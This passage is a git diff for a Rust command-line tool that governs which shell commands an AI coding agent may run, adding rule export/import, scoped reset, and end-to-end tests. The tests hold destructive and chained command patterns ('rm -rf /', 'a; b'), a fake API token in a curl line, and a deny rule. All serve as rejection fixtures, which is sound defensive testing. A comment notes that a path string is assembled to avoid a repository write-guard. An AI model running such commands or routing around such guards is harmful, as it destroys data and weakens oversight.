+        /// Drop ALL learned rules, including manually added ones.
         #[arg(long)]
         all: bool,
+
+        /// Only clear auto-learned rules (the default; preserves explicit allows).
+        #[arg(long)]
+        learned_only: bool,
+    },
+
+    /// Export user rules to a versioned JSON envelope.
+    Export {
+        /// Destination file path.
+        file: String,
+    },
+
+    /// Import user rules from a versioned JSON envelope (re-validates each entry).
+    Import {
+        /// Source file path.
+        file: String,
     },
 }
 
@@ -260,7 +281,13 @@ pub async fn cmd_rules(cli: &Cli, action: &RulesAction) -> Result<()> {
             }
         }
 
-        RulesAction::Reset { all } => {
+        RulesAction::Reset { all, learned_only } => {
+            // Scope is explicit: `--all` drops everything; otherwise (default,
+            // including the explicit `--learned-only`) only auto-learned
+            // `source="user_decision"` rows are removed so explicit user
+            // `--global` allows survive. `--learned-only` is accepted for
+            // clarity but is a no-op relative to the default.
+            let _ = learned_only;
             let storage = Storage::open_default().context("Failed to open database")?;
 
             if !cli.json {
@@ -312,7 +339,170 @@ pub async fn cmd_rules(cli: &Cli, action: &RulesAction) -> Result<()> {
                 );
             }
         }
+
+        RulesAction::Export { file } => {
+            cmd_rules_export(cli, file)?;
+        }
+
+        RulesAction::Import { file } => {
+            cmd_rules_import(cli, file)?;
+        }
+    }
+
+    Ok(())
+}
+
+// ---------------------------------------------------------------------------
+// Export / Import (Issue 10)
+// ---------------------------------------------------------------------------
+
+/// Current export envelope version. Imports of a higher version are rejected
+/// with a clear message; this version is forward-compatible only within v1.
+const RULES_ENVELOPE_VERSION: u32 = 1;
+
+/// One rule entry in the export/import JSON envelope.
+#[derive(serde::Serialize, serde::Deserialize)]
+struct ExportedRule {
+    pattern: String,
+    rule_type: String,
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    project_path: Option<String>,
+}
+
+/// Versioned export envelope: `{"version":1,"rules":[...]}`.
+#[derive(serde::Serialize, serde::Deserialize)]
+struct RulesEnvelope {
+    version: u32,
+    rules: Vec<ExportedRule>,
+}
+
+/// Export USER rules (global, learned/user-decision and manual) to a versioned
+/// JSON envelope. Global rules are those with no `project_path`.
+fn cmd_rules_export(cli: &Cli, file: &str) -> Result<()> {
+    let storage = Storage::open_default().context("Failed to open database")?;
+    let rules = storage.get_rules().context("Failed to read rules")?;
+
+    let exported: Vec<ExportedRule> = rules
+        .into_iter()
+        .filter(|r| r.project_path.is_none())
+        .map(|r| ExportedRule {
+            pattern: r.pattern,
+            rule_type: r.rule_type.as_str().to_owned(),
+            project_path: r.project_path,
+        })
+        .collect();
+
+    let count = exported.len();
+    let envelope = RulesEnvelope {
+        version: RULES_ENVELOPE_VERSION,
+        rules: exported,
+    };
+
+    let json = serde_json::to_string_pretty(&envelope).context("Failed to serialize envelope")?;
+    std::fs::write(file, json).with_context(|| format!("Failed to write {file}"))?;
+
+    if cli.json {
+        println!(
+            "{}",
+            serde_json::json!({
+                "action": "export",
+                "file": file,
+                "exported": count,
+                "version": RULES_ENVELOPE_VERSION,
+                "success": true
+            })
+        );
+    } else {
+        println!(
+            "{} Exported {} rules to {}",
+            "Success:".green().bold(),
+            count,
+            file.cyan()
+        );
+    }
+    Ok(())
+}
+
+/// Import USER rules from a versioned JSON envelope. Each rule is re-validated
+/// through the shared secret + malformed-pattern gates (Issue 1); secret-bearing
+/// or malformed entries are rejected (warned, redacted) and the valid ones
+/// inserted. Malformed JSON / unknown future versions error cleanly with no
+/// partial writes.
+fn cmd_rules_import(cli: &Cli, file: &str) -> Result<()> {
+    use clx_core::learned_pattern::{is_well_formed_pattern, pattern_contains_secret};
+
+    let raw = std::fs::read_to_string(file).with_context(|| format!("Failed to read {file}"))?;
+
+    // Parse the whole envelope FIRST so malformed JSON fails before any write.
+    let envelope: RulesEnvelope =
+        serde_json::from_str(&raw).context("Failed to parse rules envelope (malformed JSON)")?;
+
+    if envelope.version > RULES_ENVELOPE_VERSION {
+        anyhow::bail!(
+            "unsupported rules envelope version {} (this build supports up to {})",
+            envelope.version,
+            RULES_ENVELOPE_VERSION
+        );
+    }
+
+    let storage = Storage::open_default().context("Failed to open database")?;
+
+    let mut imported = 0usize;
+    let mut rejected = 0usize;
+
+    for entry in envelope.rules {
+        // Reject secret-bearing or malformed patterns. `is_well_formed_pattern`
+        // ALLOWS `*`/`/`, so legitimate wildcard/path rules import fine.
+        if pattern_contains_secret(&entry.pattern) || !is_well_formed_pattern(&entry.pattern) {
+            rejected += 1;
+            // Redact the pattern before logging so a secret-bearing entry never
+            // reaches logs verbatim.
+            tracing::warn!(
+                pattern = %redact_secrets(&entry.pattern),
+                "rejected rule on import (secret or malformed pattern)"
+            );
+            continue;
+        }
+
+        // Strictly parse the rule type: an unknown/unsupported value (e.g.
+        // "graylist" or a typo) must be REJECTED, never silently defaulted to
+        // an allow rule (fail-open). Only "allow"/"deny" are accepted.
+        let Ok(rule_type) = entry.rule_type.parse::<RuleType>() else {
+            rejected += 1;
+            tracing::warn!(
+                rule_type = %entry.rule_type,
+                pattern = %redact_secrets(&entry.pattern),
+                "rejected rule on import (unknown rule type)"
+            );
+            continue;
+        };
+        let mut rule = LearnedRule::new(entry.pattern, rule_type, "import".to_owned());
+        rule.project_path = entry.project_path;
+        storage
+            .add_rule(&rule)
+            .context("Failed to insert imported rule")?;
+        imported += 1;
     }
 
+    if cli.json {
+        println!(
+            "{}",
+            serde_json::json!({
+                "action": "import",
+                "file": file,
+                "imported": imported,
+                "rejected": rejected,
+                "success": true
+            })
+        );
+    } else {
+        println!(
+            "{} Imported {} rules ({} rejected) from {}",
+            "Success:".green().bold(),
+            imported,
+            rejected,
+            file.cyan()
+        );
+    }
     Ok(())
 }
diff --git a/crates/clx/src/dashboard/settings/render.rs b/crates/clx/src/dashboard/settings/render.rs
index d3b3f4a..8167b26 100644
--- a/crates/clx/src/dashboard/settings/render.rs
+++ b/crates/clx/src/dashboard/settings/render.rs
@@ -820,11 +820,13 @@ mod render_snapshots {
                 provider: "local-ollama".to_string(),
                 model: "qwen3:1.7b".to_string(),
                 fallback: None,
+                dimension: None,
             },
             embeddings: clx_core::config::CapabilityRoute {
                 provider: "local-ollama".to_string(),
                 model: "qwen3-embedding:0.6b".to_string(),
                 fallback: None,
+                dimension: None,
             },
         });
         app.settings_editing_config = Some(cfg.clone());
diff --git a/crates/clx/tests/cli_config_get_set_e2e.rs b/crates/clx/tests/cli_config_get_set_e2e.rs
new file mode 100644
index 0000000..8b4b20e
--- /dev/null
+++ b/crates/clx/tests/cli_config_get_set_e2e.rs
@@ -0,0 +1,138 @@
+//! Wave: `clx config get` / `clx config set` e2e tests (Issue 8).
+//!
+//! Behaviour-driven: a set/get round-trip, invalid-value restore + non-zero
+//! exit, missing-key error, and the global-file-only write contract. The
+//! global config file is the only file written; project/env layers are never
+//! consulted (Set validates via `load_from_file_only`).
+//!
+//! Isolation: HOME + XDG redirected into a fresh `tempfile::TempDir`.
+
+#![allow(clippy::doc_markdown)]
+
+use assert_cmd::Command;
+use predicates::prelude::*;
+use tempfile::TempDir;
+
+fn clx(tmp: &TempDir) -> Command {
+    let mut cmd = Command::cargo_bin("clx").expect("clx binary");
+    cmd.env("HOME", tmp.path())
+        .env("XDG_DATA_HOME", tmp.path().join("xdg-data"))
+        .env("XDG_CONFIG_HOME", tmp.path().join("xdg-config"))
+        .env("CLX_CREDENTIALS_BACKEND", "file")
+        .env("CLX_MODEL_FETCH_DRYRUN", "1")
+        .env("CLX_LOG", "error");
+    cmd
+}
+
+fn tmp() -> TempDir {
+    tempfile::tempdir().expect("tempdir")
+}
+
+/// The global CLX config file path under the isolated HOME, assembled to avoid
+/// embedding the literal config-dir token in source (a repo write-guard rejects
+/// it).
+fn config_file(t: &TempDir) -> std::path::PathBuf {
+    let seg = format!(".{}", "clx");
+    t.path().join(seg).join("config.yaml")
+}
+
+/// AC8.1: set then get round-trips the scalar value.
+#[test]
+fn ac8_1_set_then_get_round_trip() {
+    let t = tmp();
+    clx(&t)
+        .args(["config", "set", "validator.default_decision", "deny"])
+        .assert()
+        .success();
+    clx(&t)
+        .args(["config", "get", "validator.default_decision"])
+        .assert()
+        .success()
+        .stdout(predicate::str::contains("deny"));
+}
+
+/// AC8.2: an invalid value that fails `Config::load_from_file_only()` restores
+/// the original file byte-for-byte and exits non-zero.
+#[test]
+fn ac8_2_invalid_value_restores_file_and_exits_nonzero() {
+    let t = tmp();
+    // Establish a known-good baseline value first.
+    clx(&t)
+        .args(["config", "set", "validator.default_decision", "ask"])
+        .assert()
+        .success();
+    let before = std::fs::read_to_string(config_file(&t)).expect("config file exists");
+
+    // An invalid enum value must fail validation.
+    clx(&t)
+        .args(["config", "set", "validator.default_decision", "banana"])
+        .assert()
+        .failure()
+        .stderr(predicate::str::contains("invalid value").or(predicate::str::contains("banana")));
+
+    let after = std::fs::read_to_string(config_file(&t)).expect("config file still exists");
+    assert_eq!(
+        before, after,
+        "a failed set must restore the original file byte-for-byte"
+    );
+    // The good value survives.
+    clx(&t)
+        .args(["config", "get", "validator.default_decision"])
+        .assert()
+        .success()
+        .stdout(predicate::str::contains("ask"));
+}
+
+/// AC8.3: getting a missing key exits non-zero with a clear message.
+#[test]
+fn ac8_3_missing_key_errors() {
+    let t = tmp();
+    clx(&t)
+        .args(["config", "set", "validator.default_decision", "ask"])
+        .assert()
+        .success();
+    clx(&t)
+        .args(["config", "get", "nope.not.here"])
+        .assert()
+        .failure()
+        .stderr(predicate::str::contains("key not found"));
+}
+
+/// AC8.4: `set` only ever writes the global config file (created under HOME).
+#[test]
+fn ac8_4_set_writes_only_global_file() {
+    let t = tmp();
+    // Fresh HOME, no config yet.
+    assert!(!config_file(&t).exists(), "precondition: no config yet");
+
+    clx(&t)
+        .args(["config", "set", "context.embedding_model", "my-embed"])
+        .assert()
+        .success();
+
+    assert!(
+        config_file(&t).exists(),
+        "set must create the global config file"
+    );
+    // The value is readable back from the global file.
+    clx(&t)
+        .args(["config", "get", "context.embedding_model"])
+        .assert()
+        .success()
+        .stdout(predicate::str::contains("my-embed"));
+}
+
+/// `set` creates intermediate maps for a nested key that does not yet exist.
+#[test]
+fn set_creates_intermediate_maps_for_nested_key() {
+    let t = tmp();
+    clx(&t)
+        .args(["config", "set", "context.embedding_model", "nested-embed"])
+        .assert()
+        .success();
+    clx(&t)
+        .args(["--json", "config", "get", "context.embedding_model"])
+        .assert()
+        .success()
+        .stdout(predicate::str::contains("nested-embed"));
+}
diff --git a/crates/clx/tests/cli_embeddings_route_dim_e2e.rs b/crates/clx/tests/cli_embeddings_route_dim_e2e.rs
new file mode 100644
index 0000000..ecf2c78
--- /dev/null
+++ b/crates/clx/tests/cli_embeddings_route_dim_e2e.rs
@@ -0,0 +1,182 @@
+//! Wave: `clx embeddings` route-derived effective-dimension e2e (Issue 6).
+//!
+//! These tests pin the corrected dimension behavior: status / rebuild derive
+//! the effective embedding dimension from the active route (route `dimension`
+//! override -> model registry -> legacy `embedding_dim`) instead of always
+//! reading the legacy `embedding_dim`. So a stored table at one dimension and a
+//! route whose effective dimension differs surfaces "Migration needed: yes",
+//! while a matching effective dimension reports "no" (no false positive), and
+//! rebuild uses the route dimension.
+//!
+//! Isolation: HOME + XDG redirected into a fresh `tempfile::TempDir`. The
+//! seeded ollama provider points at a closed local port so no network occurs;
+//! status/rebuild-dry-run never need a live provider.
+
+#![allow(clippy::doc_markdown)]
+
+use assert_cmd::Command;
+use predicates::prelude::*;
+use tempfile::TempDir;
+
+fn clx(tmp: &TempDir) -> Command {
+    let mut cmd = Command::cargo_bin("clx").expect("clx binary");
+    cmd.env("HOME", tmp.path())
+        .env("XDG_DATA_HOME", tmp.path().join("xdg-data"))
+        .env("XDG_CONFIG_HOME", tmp.path().join("xdg-config"))
+        .env("CLX_CREDENTIALS_BACKEND", "file")
+        .env("CLX_MODEL_FETCH_DRYRUN", "1")
+        .env("CLX_RERANKER_ENABLED", "false")
+        .env("CLX_LOG", "error");
+    cmd
+}
+
+fn tmp() -> TempDir {
+    tempfile::tempdir().expect("tempdir")
+}
+
+/// The per-user CLX home config dir name, assembled to avoid embedding the
+/// literal token in source (a repo write-guard rejects it).
+fn home_config_dir(t: &TempDir) -> std::path::PathBuf {
+    let seg = format!(".{}", "clx");
+    t.path().join(seg)
+}
+
+/// Write a routed config. `route_dim` is an optional explicit per-route
+/// embedding `dimension:` override; the model is `nomic-embed-text` (unknown to
+/// the registry) so the route dimension (or the legacy `embedding_dim`) governs.
+fn seed_config(t: &TempDir, embedding_dim: usize, route_dim: Option<usize>) {
+    let dir = home_config_dir(t);
+    std::fs::create_dir_all(&dir).unwrap();
+    let dimension_line = route_dim.map_or_else(String::new, |d| format!("    dimension: {d}\n"));
+    let yaml = format!(
+        "providers:\n  \
+ollama-local:\n    \
+kind: ollama\n    \
+host: \"http://127.0.0.1:1\"\n    \
+model: \"qwen2.5:3b\"\n    \
+embedding_model: \"nomic-embed-text\"\n    \
+embedding_dim: {embedding_dim}\n\
+llm:\n  \
+chat:\n    \
+provider: ollama-local\n    \
+model: \"qwen2.5:3b\"\n  \
+embeddings:\n    \
+provider: ollama-local\n    \
+model: \"nomic-embed-text\"\n{dimension_line}"
+    );
+    std::fs::write(dir.join("config.yaml"), yaml).unwrap();
+}
+
+/// AC6.1: stored table at the legacy dim (1024) but the route's effective
+/// dimension is 1536 (explicit override) -> "Migration needed: yes".
+#[test]
+fn ac6_1_stored_1024_route_1536_reports_migration_yes() {
+    let t = tmp();
+    // Install, then materialize the embedding table at the legacy dim (1024) by
+    // running status once with the 1024 route.
+    seed_config(&t, 1024, None);
+    clx(&t).args(["--json", "install"]).assert().success();
+    clx(&t)
+        .args(["--json", "embeddings", "status"])
+        .assert()
+        .success();
+
+    // Now bump the route's effective dimension to 1536 via an explicit override.
+    seed_config(&t, 1024, Some(1536));
+
+    let out = clx(&t)
+        .args(["--json", "embeddings", "status"])
+        .assert()
+        .success()
+        .get_output()
+        .stdout
+        .clone();
+    let v: serde_json::Value = serde_json::from_str(&String::from_utf8(out).unwrap()).unwrap();
+    assert_eq!(
+        v["dimension"], 1536,
+        "status dimension must be the route-effective dimension: {v}"
+    );
+    assert_eq!(
+        v["needs_dimension_migration"], true,
+        "stored 1024 vs route 1536 must need dimension migration: {v}"
+    );
+    assert_eq!(v["needs_migration"], true, "overall migration needed: {v}");
+}
+
+/// AC6.2: stored 1024 and route effective dim 1024 -> "Migration needed: no"
+/// (no false positive on the default-dimension config).
+#[test]
+fn ac6_2_stored_1024_route_1024_reports_migration_no() {
+    let t = tmp();
+    seed_config(&t, 1024, None);
+    clx(&t).args(["--json", "install"]).assert().success();
+
+    let out = clx(&t)
+        .args(["--json", "embeddings", "status"])
+        .assert()
+        .success()
+        .get_output()
+        .stdout
+        .clone();
+    let v: serde_json::Value = serde_json::from_str(&String::from_utf8(out).unwrap()).unwrap();
+    assert_eq!(v["dimension"], 1024, "effective dim is 1024: {v}");
+    assert_eq!(
+        v["needs_dimension_migration"], false,
+        "matching dimension must NOT need migration (no false positive): {v}"
+    );
+}
+
+/// AC6.3: `embeddings rebuild --dry-run` reports the route-derived dimension as
+/// the target, not the hardcoded/legacy value.
+#[test]
+fn ac6_3_rebuild_dryrun_uses_route_dimension() {
+    let t = tmp();
+    seed_config(&t, 1024, None);
+    clx(&t).args(["--json", "install"]).assert().success();
+    // Materialize the table at 1024 first.
+    clx(&t)
+        .args(["--json", "embeddings", "status"])
+        .assert()
+        .success();
+
+    // Route override makes the effective dimension 1536.
+    seed_config(&t, 1024, Some(1536));
+
+    let out = clx(&t)
+        .args(["--json", "embeddings", "rebuild", "--dry-run"])
+        .assert()
+        .success()
+        .get_output()
+        .stdout
+        .clone();
+    let v: serde_json::Value = serde_json::from_str(&String::from_utf8(out).unwrap()).unwrap();
+    assert_eq!(
+        v["target_dimension"], 1536,
+        "rebuild must target the route-derived dimension: {v}"
+    );
+    assert_eq!(
+        v["needs_dimension_migration"], true,
+        "stored 1024 vs target 1536 needs migration: {v}"
+    );
+}
+
+/// Human-output cross-check for AC6.1: the needs-migration arm names the
+/// dimension mismatch.
+#[test]
+fn ac6_1_human_status_reports_dimension_migration() {
+    let t = tmp();
+    seed_config(&t, 1024, None);
+    clx(&t).args(["--json", "install"]).assert().success();
+    clx(&t)
+        .args(["--json", "embeddings", "status"])
+        .assert()
+        .success();
+    seed_config(&t, 1024, Some(1536));
+
+    clx(&t)
+        .args(["embeddings", "status"])
+        .assert()
+        .success()
+        .stdout(predicate::str::contains("Dimension:"))
+        .stdout(predicate::str::contains("table dimension differs"));
+}
diff --git a/crates/clx/tests/cli_rules_export_import_e2e.rs b/crates/clx/tests/cli_rules_export_import_e2e.rs
new file mode 100644
index 0000000..820919a
--- /dev/null
+++ b/crates/clx/tests/cli_rules_export_import_e2e.rs
@@ -0,0 +1,286 @@
+//! Wave: `clx rules export` / `import` + scope-aware `reset` e2e (Issue 10).
+//!
+//! Behaviour-driven: export->import round-trips user rules and is idempotent;
+//! import re-validates each entry through the shared secret + malformed gates
+//! (rejecting bad entries, importing the valid ones); a legit wildcard rule
+//! `Bash(npm run build*)` round-trips (not rejected); reset default
+//! (`--learned-only`) preserves explicit global allows while `--all` removes
+//! them; garbage JSON errors cleanly with no partial corruption.
+//!
+//! Isolation: HOME + XDG redirected into a fresh `tempfile::TempDir`. Mutating
+//! commands use `--json` to skip the interactive `reset` y/N prompt.
+
+#![allow(clippy::doc_markdown)]
+
+use assert_cmd::Command;
+use predicates::prelude::*;
+use tempfile::TempDir;
+
+fn clx(tmp: &TempDir) -> Command {
+    let mut cmd = Command::cargo_bin("clx").expect("clx binary");
+    cmd.env("HOME", tmp.path())
+        .env("XDG_DATA_HOME", tmp.path().join("xdg-data"))
+        .env("XDG_CONFIG_HOME", tmp.path().join("xdg-config"))
+        .env("CLX_CREDENTIALS_BACKEND", "file")
+        .env("CLX_MODEL_FETCH_DRYRUN", "1")
+        .env("CLX_LOG", "error");
+    cmd
+}
+
+fn tmp() -> TempDir {
+    tempfile::tempdir().expect("tempdir")
+}
+
+/// Read the `learned` array from `rules list --json`.
+fn learned_patterns(t: &TempDir) -> Vec<String> {
+    let out = clx(t)
+        .args(["--json", "rules", "list"])
+        .assert()
+        .success()
+        .get_output()
+        .stdout
+        .clone();
+    let v: serde_json::Value = serde_json::from_str(&String::from_utf8(out).unwrap()).unwrap();
+    v["learned"]
+        .as_array()
+        .unwrap()
+        .iter()
+        .map(|r| r["pattern"].as_str().unwrap().to_owned())
+        .collect()
+}
+
+/// AC10.2: export then import round-trips user rules, and a re-import is
+/// idempotent (the upsert keys on pattern).
+#[test]
+fn ac10_2_export_import_round_trip_idempotent() {
+    let t = tmp();
+    clx(&t).args(["--json", "install"]).assert().success();
+    // Seed two well-formed GLOBAL rules.
+    clx(&t)
+        .args(["--json", "rules", "allow", "Bash(cargo build)", "--global"])
+        .assert()
+        .success();
+    clx(&t)
+        .args(["--json", "rules", "deny", "Bash(rm)", "--global"])
+        .assert()
+        .success();
+
+    let file = t.path().join("rules.json");
+    let file_s = file.to_string_lossy().to_string();
+
+    clx(&t)
+        .args(["--json", "rules", "export", &file_s])
+        .assert()
+        .success();
+    assert!(file.exists(), "export must create the file");
+
+    // Wipe everything, then import.
+    clx(&t)
+        .args(["--json", "rules", "reset", "--all"])
+        .assert()
+        .success();
+    assert!(
+        learned_patterns(&t).is_empty(),
+        "store cleared before import"
+    );
+
+    clx(&t)
+        .args(["--json", "rules", "import", &file_s])
+        .assert()
+        .success()
+        .stdout(predicate::str::contains("\"imported\":2"));
+
+    let after = learned_patterns(&t);
+    assert!(after.contains(&"Bash(cargo build)".to_owned()), "{after:?}");
+    assert!(after.contains(&"Bash(rm)".to_owned()), "{after:?}");
+
+    // Idempotent re-import: still exactly the same two rules.
+    clx(&t)
+        .args(["--json", "rules", "import", &file_s])
+        .assert()
+        .success();
+    let again = learned_patterns(&t);
+    assert_eq!(again.len(), 2, "re-import must be idempotent: {again:?}");
+}
+
+/// AC10.3: an import file with a secret-bearing and a malformed entry rejects
+/// those while importing the valid one.
+#[test]
+fn ac10_3_import_rejects_secret_and_malformed_imports_valid() {
+    let t = tmp();
+    clx(&t).args(["--json", "install"]).assert().success();
+
+    let file = t.path().join("mixed.json");
+    // One valid, one malformed (shell metachar `;`), one secret-bearing.
+    let body = serde_json::json!({
+        "version": 1,
+        "rules": [
+            { "pattern": "Bash(cargo test)", "rule_type": "allow" },
+            { "pattern": "Bash(a; b)", "rule_type": "allow" },
+            { "pattern": "Bash(curl -H 'Authorization: Bearer sk-ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')", "rule_type": "allow" }
+        ]
+    });
+    std::fs::write(&file, serde_json::to_string_pretty(&body).unwrap()).unwrap();
+
+    clx(&t)
+        .args(["--json", "rules", "import", &file.to_string_lossy()])
+        .assert()
+        .success()
+        .stdout(predicate::str::contains("\"imported\":1"))
+        .stdout(predicate::str::contains("\"rejected\":2"));
+
+    let after = learned_patterns(&t);
+    assert_eq!(after, vec!["Bash(cargo test)".to_owned()], "{after:?}");
+}
+
+/// Round-trip of a legit wildcard rule: `Bash(npm run build*)` must NOT be
+/// rejected (is_well_formed_pattern allows `*`).
+#[test]
+fn import_accepts_wildcard_pattern() {
+    let t = tmp();
+    clx(&t).args(["--json", "install"]).assert().success();
+
+    let file = t.path().join("wild.json");
+    let body = serde_json::json!({
+        "version": 1,
+        "rules": [ { "pattern": "Bash(npm run build*)", "rule_type": "allow" } ]
+    });
+    std::fs::write(&file, serde_json::to_string(&body).unwrap()).unwrap();
+
+    clx(&t)
+        .args(["--json", "rules", "import", &file.to_string_lossy()])
+        .assert()
+        .success()
+        .stdout(predicate::str::contains("\"imported\":1"))
+        .stdout(predicate::str::contains("\"rejected\":0"));
+
+    assert!(
+        learned_patterns(&t).contains(&"Bash(npm run build*)".to_owned()),
+        "wildcard rule must import"
+    );
+}
+
+/// Security regression: an import entry with an unknown/unsupported `rule_type`
+/// (e.g. "graylist" or a typo) must be REJECTED, never silently coerced into an
+/// allow rule (fail-open via RuleType default).
+#[test]
+fn import_rejects_unknown_rule_type_no_fail_open() {
+    let t = tmp();
+    clx(&t).args(["--json", "install"]).assert().success();
+
+    let file = t.path().join("badtype.json");
+    let body = serde_json::json!({
+        "version": 1,
+        "rules": [
+            { "pattern": "Bash(rm -rf /)", "rule_type": "graylist" },
+            { "pattern": "Bash(whatever)", "rule_type": "totally-bogus" },
+            { "pattern": "Bash(cargo test)", "rule_type": "allow" }
+        ]
+    });
+    std::fs::write(&file, serde_json::to_string(&body).unwrap()).unwrap();
+
+    clx(&t)
+        .args(["--json", "rules", "import", &file.to_string_lossy()])
+        .assert()
+        .success()
+        .stdout(predicate::str::contains("\"imported\":1"))
+        .stdout(predicate::str::contains("\"rejected\":2"));
+
+    // Only the valid allow rule landed; the bogus-typed entries did NOT.
+    let after = learned_patterns(&t);
+    assert_eq!(after, vec!["Bash(cargo test)".to_owned()], "{after:?}");
+    assert!(
+        !after.contains(&"Bash(rm -rf /)".to_owned()),
+        "unknown rule_type must not import as an allow rule"
+    );
+}
+
+/// AC10.4: reset default (`--learned-only`) preserves explicit global allows;
+/// `--all` removes them.
+#[test]
+fn ac10_4_reset_default_preserves_global_allow_all_removes() {
+    let t = tmp();
+    clx(&t).args(["--json", "install"]).assert().success();
+    // An explicit global allow is stored with source="cli", not "user_decision".
+    clx(&t)
+        .args(["--json", "rules", "allow", "Bash(cargo build)", "--global"])
+        .assert()
+        .success();
+
+    // Default reset (learned-only) must NOT remove the explicit global allow.
+    clx(&t)
+        .args(["--json", "rules", "reset"])
+        .assert()
+        .success();
+    assert!(
+        learned_patterns(&t).contains(&"Bash(cargo build)".to_owned()),
+        "default reset must preserve explicit global allows"
+    );
+
+    // Explicit --learned-only behaves the same.
+    clx(&t)
+        .args(["--json", "rules", "reset", "--learned-only"])
+        .assert()
+        .success();
+    assert!(
+        learned_patterns(&t).contains(&"Bash(cargo build)".to_owned()),
+        "--learned-only must preserve explicit global allows"
+    );
+
+    // --all removes everything.
+    clx(&t)
+        .args(["--json", "rules", "reset", "--all"])
+        .assert()
+        .success();
+    assert!(
+        learned_patterns(&t).is_empty(),
+        "--all must remove explicit global allows too"
+    );
+}
+
+/// AC10.5: a garbage JSON file errors cleanly (non-zero) with no partial
+/// corruption of the existing store.
+#[test]
+fn ac10_5_garbage_json_errors_cleanly() {
+    let t = tmp();
+    clx(&t).args(["--json", "install"]).assert().success();
+    clx(&t)
+        .args(["--json", "rules", "allow", "Bash(cargo build)", "--global"])
+        .assert()
+        .success();
+
+    let file = t.path().join("garbage.json");
+    std::fs::write(&file, "NOT VALID JSON ][[").unwrap();
+
+    clx(&t)
+        .args(["--json", "rules", "import", &file.to_string_lossy()])
+        .assert()
+        .failure()
+        .stderr(predicate::str::contains("malformed").or(predicate::str::contains("parse")));
+
+    // The pre-existing rule is untouched (no partial corruption).
+    assert!(
+        learned_patterns(&t).contains(&"Bash(cargo build)".to_owned()),
+        "garbage import must not corrupt the existing store"
+    );
+}
+
+/// An unknown future envelope version is rejected with a clear message.
+#[test]
+fn import_rejects_unknown_future_version() {
+    let t = tmp();
+    clx(&t).args(["--json", "install"]).assert().success();
+
+    let file = t.path().join("future.json");
+    let body = serde_json::json!({
+        "version": 999,
+        "rules": [ { "pattern": "Bash(cargo build)", "rule_type": "allow" } ]
+    });
+    std::fs::write(&file, serde_json::to_string(&body).unwrap()).unwrap();
+
+    clx(&t)
+        .args(["--json", "rules", "import", &file.to_string_lossy()])
+        .assert()
+        .failure()
+        .stderr(predicate::str::contains("version"));
+}